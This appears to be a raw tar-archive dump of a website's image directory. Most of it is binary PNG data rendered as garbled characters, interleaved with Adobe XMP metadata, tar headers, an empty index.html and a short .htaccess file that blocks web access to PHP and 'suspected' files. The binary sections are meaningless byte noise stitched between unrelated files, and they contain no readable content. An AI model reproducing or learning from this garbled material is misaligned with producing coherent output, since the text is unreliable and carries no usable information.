�NDe5�S�h~������v���~J�q���-;�����j����.�k��n��4@O�gց�d��'�f�Ñ�̊fl:|va*I���`PM�{@E�(���ڂ����/k�fo i59hp�oo��'��5��2�x�0����y��,�%���t(��U<�����OL��i|vv U7G�pY@փx���È(����`|�ʑǍC)����dQ��J6�!���7�E�p���>Å��p��-�|��r~�k(o�g�PA�3���,���q�EE~X2�5�k�J��A��t
�f8jmL/��uYuJ0�#��I��}�)�M��ߎ 7蝛%H�(vͻҤ@Iib9(�OT��I*����c�
5�_#n���	"�~�?���G�Ͳ��S-L��P6<���*����qL��y��+��'�.��™V��hC@	���&�՞n��
(JT	A��ߦ0-6���k\���$6�d1��!�:N[ x(~���rY���ғ0���x�J}��9wjZ����S��NqiC3TC����)���l�dU�W3�-���1kւ>Z�h�5ڟڐaM�8KT��	^�l�9�sB�気v���g��f7�7[��y&M1_�lps�Ѫk���,�W��9ܥ�����u��tR�h�54GJ�U	�H�0��,|�P�Z;0�9�,u����zY�OD�A;^�(/���n���Vt�p�>Н�&!	߳	R��'���1<S�ҹ��o�s���i����'N�m�Ǚ�.6>
ۆ2��c�L��U���'�n��@(渢$���%@J��~'g���ꡜG_VŬ���e���2���}��M���i���`�w�Y=G�{�H,�U8� �r7�b�K�c'V���	��5՜s�a?��Ӽ�ȕֹ��I�#li�p�C�N��v=�?��ɂşI���׆dE\$�T�����d%5I|C�T�;+Tܼ�Ø��H}�
��,����+}�c���n;����X��{نh�9��g�O
��T�y��HeCI�$��#r��c�l�Γ&�αiڣu�4�Cd��l�T.`��"`_m�٢������X�9�:��4�w%n�4��py
���	�%�ѵH��j�@��i���~��_�+�9����c�#^k��Rd�z��{q���^�eT�)V���n?���e.��[�m��U"��˃3�dr��:p��$0�5����Cy�Ȱ�c�Q"�;��>�3��t�*�\"��٩)F�f�=u�jI)�-\�FV��[�/v0͹�f��x?2�.O
��E0�´aW�>�Ke�{��_��v�A�Pw�H�r3�&y�Qnc�P�G+n�+��+�H�G�S0��}��a(�#�(��P%}_�Qw�k}E���ߌ��$�3T0����B+�l������w����V��|c��������Y�]��fN�M�󉳮�Pr��N��PΜ}=8�

 9��`.�N�d,�T1��8�Z��b��Ghjv��$R�^�d�ӳ��P(����!p�y���g�P8���ʮ��tU0mڈ\�b�{W��:7�Þϙ�� >��
RH	��<�`6�sм�Vv2♑P�#��g�k+�5��%@8v����mʿ�)n|/,���� fZ�N��8<��`�3p��	�#즨��X��"���?%����j�Hw��`�$��l�dIEND�B`�images/02/02/upload.png000060400000003507152434416630010456 0ustar00�PNG


IHDR) �oQ>tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:35A9794A52A011E3A0DFEE45FEA3B7A2" xmpMM:DocumentID="xmp.did:35A9794B52A011E3A0DFEE45FEA3B7A2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:35A9794852A011E3A0DFEE45FEA3B7A2" stRef:documentID="xmp.did:35A9794952A011E3A0DFEE45FEA3B7A2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>����IDATx��X�RAm.�x�\��R���=�I�|��O1b��UQAKEK��C-Vv]-�j�vaw�L���=c*
���<OD_x�P�X������7���Ҽ���Ũ���a���Q<�㓓3<�ha�\��=�P	��z?�L�T�����36���� 2�ͺ���b�;;;��������Y`���5]˻����t���	����8���q�=<<�<�kmM,��pC?�2�9	�����䠚���ҏ�jq8�L&񛃯{{{��C��5A����o擑���H�<���f��;?���q�X,�f�Z�n�Skk+���PSS��w1����GŊ���tRxp����PP"ϔ����zy����5�459)�Pi���1<L>��~�������2-A҃���@d}jwWx�%����"��&.�~;�&����E���hvf�\.��<
��P1�>uv��|>O[[[eFx\�^^^Ľ��~�'u�D��\\]]U�M�����F�T�
	P�K��jBl�H)B1@֗%
�����@�!����y����=����h�>���TW�+in0<����� gr����x��~�0���*J����АXL``�v���'�(�LR$���0*���fY�M(J �?8<��� ev��429���f��?=;+3��4)�btd�f�V��;�#.�/� 2�*�R�Jm����
N�D�Rme���PUm�lJ/C[�n^���Um�j�
�mӢ\�Q&�S��R[!�j|T�d�7P6�9$�D��c�hD�9T���t����*��IP�gp
�Hh�$����(C�NW�A�P�я��ټ!��<���rfx��Ր,��C�Bɺ���7�e��O1�!A��Zv����b|}��6�#��u>S��o�x��k ��ţ��.ж��!�IEND�B`�images/02/02/.htaccess000044400000000424152434416630010257 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/02/02/date.png000060400000004007152434416630010103 0ustar00�PNG


IHDR�A�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:B2854D57529F11E386E7862AE6025512" xmpMM:DocumentID="xmp.did:B2854D58529F11E386E7862AE6025512"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B2854D55529F11E386E7862AE6025512" stRef:documentID="xmp.did:B2854D56529F11E386E7862AE6025512"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�1�[{IDATxڌT]LU=w����˲�-?!�E�H�Z�6��b����bl�/}�I_}2&ħ�F��&%��Kb�"�&$��(P)����2�3s��m�j�;{3�w�9�9��e'NG��z��b�2�ßpγ��N|���^��IDBB���1�������x��o���M��XX\���6��DlH��������B2iñ���^��=�~qT���~���ZC������ʀ�*�k���fN֥*���	�u>�N�IK�ɘ�X
��$̍��R
u��p(��j NR���x]nz�E�D��Y�o��X_ϳH
��̥@����;3�[�n��K%iW���SA���~��a}����쏗�����:Di$�C)����!(�ť�Oq���S�80���X�N7�䑈�H�1����Pa$�&=
Vc����^nDoOnM-��� ��"er�K)dկ�K�Akۋ�
.�WT
X]���6�m� �gP�X��UbJ	����_�/���͒�W�	�"]�r`�Ip�"a���HfDm���\��C����K��ۨ�� D�Ͳ2\Ș�$���%��m����F:�u
Yd��V�}�&�BҘbCk5M�H����l�ԇ��L.��9�V�a�L����|��~�Ո�aH������<=����a(6y��s(Y���T�h-C���+��{�C�'�T�9s###8��z��FGGq�ڵ�ek����Q*���f144���iܻw�/_��;b�&��!�c;}���ĩS�P.���ގ��9ܸqG�A"��!�4�Gk��Iu�a�'��իWq��i���bjj
w�����X^^�q��O�a�-��j���<33�s���\�pG����$��00ЏL&C=�kk���������-���W�\�ώ㠫�KK'F����*V�liiiF���:`Y��e靨������Hػw/��**��NP[[�\.��g?����jS����
�B�3�ǭ�����6����5{�h}}]U��m_���_��%h��<��
���"����0��P	tl�PDkk��Z�s�?y^�b�xL����*n�l�o{K�
���P�$���eƶ�_�#��_Q*(��IEND�B`�images/02/02/index.html000060400000000042152434416630010450 0ustar00<!DOCTYPE html><title></title>
images/02/previous.png000060400000124167152434416630010633 0ustar00�PNG


IHDR�7ن��tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:6993FFB25B5D11E3B5C8966AC86791C5" xmpMM:DocumentID="xmp.did:6993FFB35B5D11E3B5C8966AC86791C5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6993FFB05B5D11E3B5C8966AC86791C5" stRef:documentID="xmp.did:6993FFB15B5D11E3B5C8966AC86791C5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�I����IDATx�\�[�m[v�/c̹�������%V�]qR��C  $�!`'O@$(R� �O�s$$��	A�yI�~A�d�H8r��L*�l"[)����Zs�1z�����ާv��Zc��G���}-�������RKJ)�^rZǯۇ�tyz�>��'���z�	_�sI5�w����������=DZ�>~�������#��e���eY�3���k�e|��㲬��=�}~N��1>�����<~�n7~~į�~������>��t]|�U�ǜ�q��m?��Ԥ��q���t�����/	��q��6��q]<˸f��
����+�˗�Y-�u�WY�>5��Z+����u|]K��|Ik�����u>���ZYk�������]q�=��V��z��Ͼ���Ň��{~�W�}xUi]�~]/��=ҸW��d��w9�r��'���eI��e�ﱏg���t�rq�v��x��=�w1�¸N��������c��a�5�:$�����u�;?_�{h�W�O?y7�\��z�s`=��{>���}�	��}���X��wC��$|R�z�=���ۖ�q�Oק�����KY��ΫaO�'�����{���u�2��}��q��=�ḟ�*��
>�{�{��]�A��[�5����},��u�9�������:s%��^����>���<Ԋ�܌c�.\�ҽ湎�<x���X���}��ZW�_|~���?Z�a֊���/|������>�z��Y�����.��{"{����m\�����{��亏�^����cw\���=�=��ݩ\����>��xⱟ�M���*�DZ�'�-����skq��K8WX�¯���s�_ư��ӛž��ƾ�wc�����n��Y�]�3,<f�v	�s�hO�>��3pp]�uXp8��>�l��k0�LJ�[��
ۃ�ӳ���Ӗ>�dl^^`�ݸ'��.�����\a�y��������瞸���2l��og
�x���c�s�.o����"}���W�����G[���_wګ���	6��w�j��n������9��l썷o��'|���u�s??�y3֨r�/�"p&�=�����g{I^^��y/�����KE������,��ho��i��/%�̎
=�ݻ���a�i�vH���r4Z�q82a��;6�6�.׎
���u�9�)�k8{{n&m�m��|:���6����!C��Ʊ��4x|���I|���`��_�?�nMZd�C�/�/��Hb1��ؤ|ѫw���\�Kʵt8�Դ~2�u|Y�Y�6�K��Ly8��{���}��q��s�/�nFY��ǵ��Ɔ^Ἢ�/6�k?���4X�4��9~���U��Q���P4�	��~���a�h����xW}���GT�����/0zpx�8�np�M��X���A��eyާ�'�u��~l�,p�~���=~�Q��5+آ��N�
C���8�8 �w��4�,!��`
eFp�gӾ�!_G�g�-qp��K|F��)*H<�A�b�qxVK���>��x.x2%��ܱ���Ad@���4��Z���y���{@{k�pv�BK~�����;n�����@@��9�a��u�h�å�%�8�Z������?�8�z�!��vG��]��)]�d�`'9֌=�{O4�-�����0֕SA	�G�¡w���1<��gh���.6�)m^�X����'ٱb�ՃM�y�
�s�Ģ0�Q0��c��Zx�'�=2�����dh���p���{��
����t�>�Vk�ǽ�~ν���=1p�g�K�&t߱Ʒ�x���/�Y^G�����Fc��Z�c8C$w�`�ӛ��$����܋�6E�08xmp�E��/�^�9���?l�.��,�/�c]�~�6�R4t&*2u�G�6>.����5��?/1(�ߣ_��C�{���ۆ��9�9b�kV:@��2����]1���1����x|�:	6�'#;Y���7n"����]��jI�"C||�
7Pj�ć��F��Ê�(��hX�������.�<c�nG����:��8:76����}�u�ơ�;~Y�>�
��̲eG�csr[gF���%��z_��
F���y����4<��a<�.����Y��H��1>w����=�.���̦[{�vE��k֧��#c��m�ed�D�i�7ZC:GQ�/�S?p�M��>֣ps*�C���"2%d�8�̈�)l�5��`���)q�! sF����Y�e����u�959�/>�':�|}���=��b��!����.�v�䲮�g��U틌�]y0_G�{��1\t�̂߯@d`4�|΅�Ye����:f�7��CHWƁ�;,4vYA�Z����H���2��dd��½��Ȗ?(�ʤ������@3
3O�[����I�z-3C�#���3qx�\F�5�)Ͻze���4�F�2ࢢ�kÎ�?ll��.1H�=�\�Xl;��1S�B���T�ek]
�c������{�~�Y�-~ΚiG�1�W0�ϴ��=�߱��*��	�h��8�Ȉ�Be_��W7� r�
��(`�>Z�����xMh��F���]�{���f��/ך>|�~��P�r��y���^�0q�:]��$n� c��7$w�]|�����%+�A�gU��s�i�?���ᙝ�љ�x݅v��w{��ęt��
�Ұ�}�W݇O�ܣק�=�?g`��B�Y�d�9�<u"��AT�H��o�}L��1���@6�م���P�d�Z�9������z�l�*�'8PƠ���N�AK�]`�i�G���SUB�}d�0�<�`d;<iF4�&�n�m��F1���=m�k2.���!�áy�*C�'�Ɨ���ÌoE�pU���I���P`D��	�m*,�N5�o�r�
��}�x��]٣1�`F�8�:Y
��׳�Fkcs�p �C($����p-Ň<��}B��e��-�:tx:��`���䲸���D����p�v�yGdQ��	C:8�1~y}M�F������eJ2�8 sf�ð����1�c����Dȳ3�㹸�H�"�mL���=��u3�&�~��訝�L������Q�z�pdpm34��/���t'^
����o�(s��͊�w{�m�	[+{��=j'����{D�`8h��V^#7�!�;�3\Gw��}�q�p�0`�	>�����Y����dF]�v��RpJ�(��� �c�%sX�����8_��a%��&$,�/��
)_�!��@��������(�)v�
zҬ�t��:����{]�����<9�H.m T�v���m��Y�¿ߓ�,ssY��@.�K�y>��}W0��3�A��]��#����c���o)���r�J�ϧ
Þ8�E&g]{� �� ��]'��@=���l�+��O�})].�*q�n#WQ�9�Ff�9%+&�����^.B_���ʮ�e�FՇ}���Q�*r�ӱ�;��:�
�2�-����
FhP��BZ��k;V����A]�|G�R���a���*��Q@�N�/���C��^\�ij�x��E�t�p��[�rs��U�,��r�0�qVc�Y�����p�*��i�idm�m��殴�ƘN�N8[�`�5~^�������A0���|�8|�2�A��3�#��g��*��
Z�>���6a��Q2ed���!���V�gu8��L:�i�:�x�f�^\צ��!tbd]�a�uYT. ̻8�ˮ���
�<��
�
���H�2�����ߌÅ��%+d��x��L��c:x�k8�E�p�Wu�u�(�,#��� Bg�c��`���u`��3`���  *.��â��ZUe���#�o�Yz���at	w�"HM�Sd�����z�D89�0�(��z���E�#��H�(bg�9>�u���~g�*lD�;	Ѹ��H�P��z#�b��������!D x8+�ti��acd�,��0k<Gcǿ{��πG+&���D_�Н0�r���Ĩ�l|_�w�e��%���$�l��*��z7�.��X�# i8�� 	�>kO��{��(8�S�����#HWS��9��E0��x�����Ĵ��qg�YY�8�Na��L�`"�߶��h��k�=j�9����DБȱ��q�E]�)�\z��뛂�n;�7���ۤ�=�s�����m#2�m$=��~�+_�-m~6e��}��<�O�������N{3�"�����K@L�u��j�Y�au���%�)�5؞�vK�.J�8RX7��N�k���9���"���9�^@6���G��(���� 2ᄸ���e^ծ���y����.gG(�,s������8�@VJ��{
�
5 BK���Й
��`��p�r�|?8|��?7ȝ�!�eQDh�S�&�(�B����2���ʅ���f��X�8}&/�wN"��]��vL6���q����ʆ*2�M��HNF+ܵ������<\Y��8��Tg��c͏���6�q"��,�̈x�
�a%<ᄳ2���y���C'oB�0��ޥ �Ľ��#�d:TU֫ydK�єe\����K��A��\�(�]�(���V�<>�:��fh�:_����{���BTX$�>A}9n�#0
�
�����i��'ن5�� AE�Zp�����Yu���}Fدc�n./�`�]����w B��YwM8��f�1Pxs}�솵ѣirM�5� ]D���[�=h�Z�����brБ�/�,M��
��`���(���]^���g�f9H?�����v���� p1��A2YZ�e�Y�.DP�J6|���$��̮�	�d��^Y�4jֻϔm�t�G��V�f6n�!WZ[���+�N�:����v��z�.ۄ`�@�dt�~�� =-�'�C�����B$�v>=?���	�%���7�=�����FT�V��Ӆ��׳�v�Lv��=?]�
p�T$��jL�*$JM�5�����r��KN����`d�OU^r�x��e�Hƪ$��@\��GV�R(�x=�
�R&�"�rW���5��3YCY����dD6�g�:;Y�
F�!�A'���GCV��0��0�4����\�]��٤��<a���ِ��$>`Q��[�~ߙ��|�_/���'�  �"C�'�T\w�M4�^�"���<4u$80	�$�,��Fjt6ϺK{��x�a�0��%q�+�Κ3�`�α���s�
�/y�9e	��!J3� эd�a����uf���|�!�.�B�D�p5�w0��0
Ѝ+�r&ۺ䓕��� ����7on�k�Q�I���4�sR���?RL�k�Y��_4��39��y8�ՙ�1��r�g����d�2K�{]�(�a���9�vD"�Џ4!d����a'���z{2Aq֠�
��rU���gqg�D��N[�ɢC:t�Վ}1�s�����C"��-'׻��n`P�GP��T�8@N9��2�[��q�6U�N��A�q���0|O:���XL0�f[D�j"g����=�L"
F釜dj��V( $�v�K\:ߍPe]#�T�S��uQ��PР�:k�`꨺�\��%����A됕�;`Q@�����
P�t��{��g��ck[輊m�`u����F�l��P��D��m/�ar��ͫ��Ľ� ��Lg�l�/�{��%\&���挏�` G$,��t�/���%�}���H�*���`�F8���'����k6����u|�<�
 ���,]��]>_Y�M�A@�|'0)k�\�<x5���0g�kB���X{��&xv�D����gg���q���g���^�_��;JQ�4#~D�S.~ǰ��
�pɆ�!4/@@�S�a���h����\�'HG�-KeK��Zdx <l���\D��nƆ`[F!���@P�i@�ѲA�R��T�yL|��;�����Qצ:#!�bHp�
��vֿa�%�D�8���
d�Ȏǎci~Vf�����֭�6&Ȭ��	�
_���a�.�+Ha������3������(��9fİ�Tj˔�H���l�E�[wD���[��f�-�	�`&�­Y.yf��S���k)���u,���΅�d���ǫ���X�Fm��E�� R�i&�\W
3���}�w�G�E�/f��>��n�VbT�qˆK5��:�؀rQg�3+�fl�P'�Nxq�[[��Ie��L�������,��M����N-9H8�]�q9��~��E?��}�;�j1�6��.\oݛ�8pЍ�0����yi����(�f�¾3;0�$�)Aކy��EF����ù>�D�`�YNq��u�2� ڄ�:L�f�HF�Y �@��Z3�*{A��e0�N'!�Q�e�G�w��f~EbP�&qH����脀�{w�Y�sv���ΏU��x���GI�UH[z�=�s#��Sh���v�'�o{3����}�̚��$�Fun� ��R�C&�2;�����܇���" ��s�4@��Tӳ���Vh��P��v��E�u|#����jO���n���y���������ˊd/��C��ȁ-�
��M?��"�����%;E7e�s]"2ɥ٠n3㺶[D�lE�j�(f*���z,(7�42��F��uD�m����Szs���	�}%�26{�}}�l�Fѝ�"^"a�S`I�E$��0ֈ�q�Lj�ZU��B��&Զ1�//&y~�!��FN��A<9��6kSMm�������0W;]��!l?���͋[�Lv�F�r�E��5�)	��_�e@ح�{�`j����%ye� �/��,��m �j���̮K�RB�d"�F�>��
Vt$�'���m�l+���JZ�63D�������%����x�{_��\�9���x���z���Gd��_�{Jb�i��6�Rc6���z�U�&#Mo�ZXU�}��T��$�D@(���u�b�l�YV>P�n&ov����5^.\+����&�����͌O��9j�kt`A��9�ea�3�n�a�L?�2�bI?:�50^�d���~��V�RD��ۅ�U �_씰'��F4̎��Umi�[�q�ߧ�5A��Ɩ�v��qG��3�����ZB�.��,14���-u���^D�5�jeT�l�j.Bw@�ݢ��G/"�P��L����&X�6���m[dc��6*Z�u���e��Pumkh/K���B�`g��~��$'��*���'���{\�ރ��F�3�7)Gh�*(B��#z�S7�0	ÞxCD��_��9���Le�"�~�@q�:��nx���3[��6�_4���s�����L���F���򝩤CN��wW�=[D���)	r)[C��흥�<��ipg�چI�_�ѣXz@���Xp�w�Y9�;�(�����s�V��ߗa�ߏ,:�ℳ���-9�j�=h���ZfI�WE=�coءzT�"�e��Z��i�����vʕ}̪}�(�W���<k��_}���p�����벒H���D?f�
��	�\�?Ģ?�JK���s}f��3Q�����W����H&&E@o�ñJ�ø��HdxlL`S�a�����`68����z�Y伊�m2}w�In�"�cß�Ќ6�,Ŧg�����z_�Bbӹi��P�D�aUӇ�Κ
 �WG���
�����&Ȫ��\һO߉HtѬ�}��gHaP��H��3}9�:�RL�b�cX�eu�R!�T���>�F'Y�2<5څ��z�7��a`��bp���w�w7�0����(:�o,!��V����\���h�ۘ%��$��DP��b��|t2��C�]~pQ'�>:;$n NF�� ��v�t��(0�|]�D��7[e'�o�>����_3D�����!فcGvf�>�1��<t!*y�&��G;T�D�-$�p�`5�P���:kԾ9���]��٪&y�2[@ɓ0�(��)g-���3j�E�����KpEhg�Vu��&	�!��Ԃ�-A�b{�=�`�BF*��f�hwe<�]<�% 8�i�-K9π�gwi|���X{��!�^��?_�YB��C+hU\���^[�PJf�]�Uf��m"��'>�5t�ꉒn�I���S���W��r�=��|�������Ae9	�Z��u��)��: �q�W�������
i�&�}�_�Ѣo���'������H�<rk��d�g�W.Fy��o��~�M6)�>����TE���$G�(�#���Ru�pXuIu�Ć��p�>���/x�B^o7*�B5�ɐ5�ͽ��*a�E�]"	9"�)v2����g�v�a������N��_|�z*�D��]}�e����'"?w�|��(Ǒ�>�q��HR�Rd���a�F�G����:�7eM̊�zL�h����Eؒ]��,	���̈́�q���/XW{~�.ի�`݌Z�?@�j���}��5]�{#|6��;����,/	�@�4�f�)�>Գ{r��R|Z
[��	�Ӏb6�����Nh�n!�~�/8�u�t�	B^yhCt�&Jݭ�T\������f �F�R:!�.�hijT�X4��W���bC�֘>����p�J6\�50S��>k����_�+��x� 5q�����ō�n(�����ƚ�0�Wk�s���eX��X�/+�^7��m��a!1c�����=�{�;ó}j��ݟ+�lE�����y^	;��y?p��%���p)�Ԫ*t��Ѭ���7���'�q�8H����w���T��=��S�E
���^�sO�SĊi�?�Q�c�Q^�^K���y���E�.�?��U�j�[�O[�r�dS�&7jc�u�`n�&{��@�JDjE�S�BAi5F��PsPX�$'%B��Y7�#X#a�u-��L�5�����L2��������8;e�
���hn/7E��z���7~ߟ�S�ה�$�6�B�Y����/&V�h��c�g�<3�K�,Ub�6��eDU�y1���C��/��%A
_�d>�]���S�5�{?��k$jST�NMĖ��L<�lvnfSf��jL�s����=5��Q礲Wt�f9���-�� �^��ɉ��e^I�ꓫb�-�q`pO��9���V�� ��]}�Ip�ѧ{(.� IG�ìT�:Ø�(��+�q�">����W��2�(�~{����8�O_zN�Gp<�P���%�p�L�f8XK��`�ʒIL�OS&ޏ��UD�	����4R�b��N�KA���Pk[`�Y�����9��t���f'C���)Vq�h_]�d@�}��&֙9>��Xij�ӮU-4=T�Xӳ�qM��^�plY��t4�*�T����7�c�m�#e.f�,���w7O�p/��56נ@#�.m�,�I�j�a�
e�.d�8�#���*PG�M2"��w/*���]����1��P�_�L%���� ��S��d4���a�O�Ѓ@i��ߍ
�5!f�r��i��fYIw��"�yi�~TˢC ��P;�3B������2�� ��r��{|;�'B��E��-T,o��=Q��p�~O��}*�TЮ��^AU4�3H�Ū��A$g��	w�3�m��>���5��LA\�
�%�O�����%�样Ouu%c�uثu5˿$��X5jpu����rS�o�����,/n���5���I.�!r�
�)�EAz����׾�G�ȿ�Ͽ���A�v	V�RH,��h-��b%���Z��l��H�+��2�	�ֻ�@e��~Q���XG�����ǂ��ܨ?�(�7�ĺ��C��g�얽��_RM�7�мΌby�6I.z."֢�j&�m��8��1����H�J�vd�xHQS���6����C#�iłd)������i�J���$Hq��]Į�{z��Ձ�ʄ��Qt���;zmpP�]C�2
�]�f�ob�)5�b}�(@X�o����]�ܗ����LÃV)E߅��%GP�6��������FN�L�C��a2��`�zk�w���[�����ڔ�s��֔n��G����]f9|�O5�c
Oɵ�#���:eB�wdoj�q�x�D@}�5�tj+�r�K\�����"(��gU��鬱Fow�u�V���]�{��RԿw5�t�0�;K`��,�PZBM�xo����*�ŵ_#�2%Xy�L-^���4�����^�֩���-��K��ަ���M���{3cbьvg��ʡ-�A�L�e�1���A
�qE��Tj��>� ����R��ݾf�&%8���g�`�^�����S:�T�m��y�s
�.����+�E+$H����w��63"��x6�A����g=6�P̄ �A�ܞ٬zV7]*	­Z�\�ppu'�%5����[� ��ݹԌT���k���(J��Gٵ����k�{$��D����Hn�xVD�l�������!��_����!p4����ۿ�˟��du?�aa���xR�$=	j<_0��c�u��V�L&��
*�.��=��L����?ń"d�[�m�t@ݚҟ~򩳅L��1)����4��e�n�&����eg��}��-�\crK�{ԛO8s	���0>|P�+j2��\҄B�a�:ʰ��z�q��W:�lV���jP܂��`�]ln�(��/jFv"���a�Xk9t��i��RMQ��=[7�p����Avk>Xo޾?߈HP1�TAӸ�9�d
xP�us��:��:j��1+	���B�LF�~�g��2E���Bu(~�!u���r�|ǔ��6g�}Q'��\��mv�yf�ʪL���-2��9�T�<h��e�.5zٝ���~�b��a�D��h�(F�NO�I���e*�%P�
e��ں'�5�MF�8�B��ZɐEX\d��<%�jF�ĝ�bC!�0��;kf!O��[�٘�����<
���@�1�-h�h�9!��
����*}өG��kFI"t~��6���<��l�Z1�C}�ڗ�{�OA�ơ$�E�=��8�y;�:#��O5O��2��R���{����E!��w�A��aݙ ʐ���3�IV�E��KZ�N�$|Xhz�dq!�)�OT�B�&�9��]0v^3٤.�I�Q*���ׄ\�W��_yQ*�Ͱm���Ts�#"T;�#�֏�����_�ַ~�QFM�������������ʪ�GѦ�=%M1���>��>����'bm�^N�P���vX`�%���0f��ܩO�}(pIrd�\һa��pڟ���ed��а�I�j�3`���Y���-E��f���f��wf�㹰}Ǚ�tx����r�:k���5^$�.6��!�	G��hS�tgI r�8S5�z��t47�'��\mJ!�~I����pj��ì�惫�(��B�G��(�)L��^/gP���;�Qo#x"��0�B�������Z����<�#E�
�k4n��y��*�Ĕ2�4�{�fV9EgܯB!��Z�׬T
�����(�{�	ZR���Q��o��T+����2�*m���ͥ�6jA���&'���u_Ez�b5�a��Y;C���(kk��D��_g4[?r��Vf2���Q���n�!�<q�/1"ih��`��ζ1֜�%gAr��\=2r��2َU!+�K^t	AJ3�MYk2�^�d&�&�3���v��L�$��ZO��SM�z��ٴ�SfYJ��p�JQӖ�?����:$9�=d|����Da"��2�R��!+lI��	��2���1았��LXS��R+G{P�Z,���-B�K�Y{�~C��q6�w�ܵ�18�k���TK�sQY��ρ�f���@rT�+�>C���D�Hy{�s���04�	e�t1�d�Z�\f�Ət ����=�3D�T��D҃�(�8�Po�:n���^��o�܏�����/��_x~z>�ۦ�ޟ���~��c���_�~���ܳ5�oW��tM���a(<D5'�p��]C�EQʶa���q��7�<H�Qcܡ��:>>��
�����OBZ�I�����vS�r�������d��}J{��(��:�M���ы�����e�Y�������K�֢%���
�%4�,�<�m:�+����d�V�f�6��Q{B@r�Vt��J8(lӁr�M-Κ�A{|YDč�[IbF�b�a�=NŬ�qxqltv�Ը7�V���ض"�JF�rdqj���M�,|?��ڶ@�<͈S��y�N���]����gV��u+�)�7��j��Qc�R�Q��բweTjc��B�vS`"�ͩ���٢aNG�v�f�ڢ��hSL' �6��9:S�7oks��Д<ۈ̧��.z�k�T�ۘ�4���0��՞��2V$'��ec�#e��*(�%{Yܹ��+j�}�G�a9� 1�	�"b�Ks��ηtz�,cЛ��ڞf�.	.��v��m������ʱ��I���W�E )�"3=�t[(��q*QD2ڌp�`��Ӊ��3~�hc@��Қ�y�sB�#{�VqiN�y��g��?�hځ]F�
G�&��mn��}�D�S�����>��/1����6�Mc|���pO��0S T�j�~:�av<�������a͒�G}�aT��"��|�h.�`���$�A�yQ��cC��~3�g~�g���_���O��/���w�{?����̏���[�����PpYN(��_O�,��w�^��� J����G�`������^�{��|��1�_�~8�ݑ��䕬]��g/��.�j���v5���q�z�@��f���?�B�]h,���������y���g�c3a��0�y�������M�ቇ�F��j�
$����>�$����X�(5{��	�T:Of' �13i��qW�,����*V��Q�~OM��Y��p���W;MyF�u�,it�
�辏�dل7����[a	���Z;��W���K8�Pdζ��yj���GF�c��y7��{cc��z�
��}�M_�9*b/&ya!��F��ΐS��者O�^j�lU,��v�ց�_����	����;��{�3���I{�Lj��a�̻[IH�J2�T���1�,t��R�$j��iNrH!
�gdʭ�Ž��^�%_�v�D�F�%��1�t�~�'��ׄ\����,�!��\<'Z�i��0�uB��Ѫa�4�>��u��y�{�
w�5�I��L�p���%%9Ѷ�h���X;h3��U�:jQ��ƲJ�
(<��T��>��<�vz�V��l��CR���1��9��-�$Q��,-Jӎ�;�hVū�	j�
���h�,�u� �����|%r֪�M���I�]G?��bݮdV{�K�;Bp����{�-��f�1���]��Eɱ��^lXE��q�������s?������_���O������5@Q���?�3?�+���_�������6S�/��=��w�7?@dAo�05�9�NJD�DQ~pr&%���~Φe����Û�4Ht��P���0)�&���%k�s�����Fm�R�h���"�/�>�77�W8���8��u����%��Bz�$�	���FO#㧬�����a2��q��F,9\w><�z�(a�Ukv��h�1ۘ��U�z�%�&T
��&4��Gx��n���SOz��W=9�
"ah�wC�$9�/}%4��
d��`�^<e*�z�^(��2���cLa8���@�3Dv�m�Z��EA� !�,�zq��ό����h��f��9D"<�2�Ťr\����u����7>��ci_8 Q�}r�;$���݇N�D
